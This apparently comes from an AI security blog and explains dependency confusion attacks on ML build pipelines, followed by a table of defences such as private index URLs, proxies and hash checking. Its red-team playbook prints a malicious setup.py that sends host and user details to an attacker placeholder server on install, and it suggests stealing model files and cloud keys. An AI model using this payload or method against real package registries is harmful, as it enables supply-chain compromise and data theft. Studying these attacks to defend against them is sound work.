10.1.4 Dependency Confusion

2025.10.06.
AI Security Blog

Your ML pipeline’s build script faithfully executes pip install -r requirements.txt. One of the lines is my-internal-data-preprocessor==1.2. This package lives on your company’s private PyPI server. What happens if an attacker uploads a package named my-internal-data-preprocessor with a higher version, say 99.9.9, to the public PyPI repository? This simple question exposes a critical vulnerability in the software supply chain that directly impacts AI systems.

The Ambiguity at the Heart of the Attack

Dependency confusion, also known as a namespace confusion attack, exploits the package resolution logic of modern package managers like pip, npm, and Maven. Many development environments are configured to search multiple repositories—typically a private, internal one for proprietary code and a public one for open-source libraries.

Kapcsolati űrlap - EN

Do you have a question about AI Security? Reach out to us here:

The vulnerability arises when a package manager is asked to fetch a dependency that exists, or could exist, in both places. If the resolution logic is not explicitly configured to prioritize the private repository or if it favors the package with the highest version number regardless of its source, it can be tricked into downloading a malicious package from the public repository instead of the legitimate internal one.

Dependency Confusion Attack Flow ML Build Server pip install my-corp-lib Private Registry my-corp-lib v1.2 Public PyPI my-corp-lib v99.9 Attacker System Receives data 1. Request package 2. Also checks public 3. Public version is higher! Pulls malicious package. 4. Malicious code executes, exfiltrates data.

The AI Supply Chain Attack Surface

While dependency confusion affects all software development, it poses unique risks to AI and machine learning pipelines. The attack surface isn’t just a web server; it’s the entire MLOps lifecycle.

  • Training Environment Compromise: A malicious package installed during training can access sensitive training data, steal cloud credentials (like AWS keys or Azure service principal secrets), or exfiltrate proprietary model architectures.
  • Subtle Model Poisoning: A more sophisticated payload could do more than just steal secrets. It could manipulate the data loader to inject a handful of poisoned samples into the training batch, creating a subtle backdoor in the final model that is extremely difficult to detect. For example, it could alter a matrix multiplication function to behave differently for a specific trigger.
  • Inference-Time Attacks: If the dependency is part of the model’s runtime environment, the malicious code could log inference requests and their outputs, stealing sensitive user data processed by the model. It could also manipulate model predictions for specific inputs, causing targeted failures.
  • Intellectual Property Theft: A compromised dependency can serialize and exfiltrate a fully trained model, which often represents significant financial and computational investment.

Red Team Playbook: Executing a Dependency Confusion Attack

As a red teamer, your goal is to demonstrate this risk. The process is straightforward but requires careful reconnaissance.

Step 1: Discover Internal Package Names

You need to find the names of proprietary, internal packages that are not meant to be public. These are your targets.

  • Code Repositories: Scan the organization’s public and private code repositories (e.g., GitHub, GitLab) for files like requirements.txt, setup.py, pyproject.toml, or package.json.
  • Leaked Configuration: Search for build scripts, Dockerfiles, or CI/CD configuration files (e.g., .gitlab-ci.yml) that may have been accidentally exposed. These often contain installation commands revealing internal package names.
  • Public Mentions: Sometimes developers mention internal tools or libraries in public forums, blog posts, or conference talks.

Step 2: Craft and Publish the Malicious Package

Once you have a list of candidate package names, check if they are available on public repositories like PyPI or npm. If a name is available, you can claim it.

Your package should have a very high version number (e.g., 99.9.9) to ensure it’s chosen by the package manager. The payload is typically placed in the package’s setup script (setup.py for Python) or an initialization file, so it executes automatically upon installation.

# Malicious setup.py for a Python package
from setuptools import setup, find_packages
import os
import socket
import requests

# This code runs on 'pip install'
try:
    hostname = socket.gethostname()
    user = os.getenv("USER")
    cwd = os.getcwd()
    
    # Exfiltrate basic info to an attacker-controlled server
    payload = {'hostname': hostname, 'user': user, 'cwd': cwd}
    requests.post("https://attacker.example.com/collector", json=payload)
except Exception:
    # Fail silently if anything goes wrong
    pass

setup(
    name='my-corp-internal-data-preprocessor', # The discovered internal package name
    version='99.9.9', # A very high version number
    packages=find_packages(),
    description='A legitimate-looking but malicious package.'
)
                

In an AI context, the payload could be adapted to find and exfiltrate files ending in .pt, .h5, or .pkl, or to read environment variables prefixed with AWS_ or MLFLOW_.

Step 3: Wait and Monitor

After publishing, the final step is to wait for an automated build system, a developer’s machine, or a CI/CD pipeline within the target organization to pull and install your package. Monitor your collection server for incoming data.

Defensive Strategies and Mitigation

Preventing dependency confusion requires enforcing strict controls over how your systems resolve and fetch software packages. Relying on default configurations is a recipe for compromise.

Defense Mechanism Description Example (Python/pip)
Scope Package Names Use namespaces or prefixes for all internal packages (e.g., mycorp-). This makes accidental name collisions with public packages less likely. Package name: mycorp-data-preprocessor
Explicit Index URL Configure package managers to use only your private repository. This is the most effective defense but can complicate fetching public packages. pip install --index-url https://private-pypi.mycorp.com/simple/ ...
Use a Proxy Repository Set up a repository manager (like Nexus or Artifactory) that acts as a proxy. It serves approved, cached public packages and your private packages from a single, trusted source. All pip requests point to one internal proxy URL.
Version Pinning Pin exact versions of all dependencies (e.g., my-corp-lib==1.2.3). While this doesn’t prevent the attack if the package is fetched for the first time, it stops unexpected upgrades to a malicious version. requirements.lock or poetry.lock file.
Client-Side Verification Use features like pip’s hash-checking mode to verify that the downloaded package matches a known-good cryptographic hash. pip install -r requirements.txt --require-hashes

For AI red teamers, encountering these defenses changes the game. Your focus shifts from a simple upload to finding gaps in these configurations. Is there one legacy build server that doesn’t use the proxy? Can you find a developer machine with a misconfigured client? The battle moves from the public internet to the intricacies of the target’s internal MLOps infrastructure.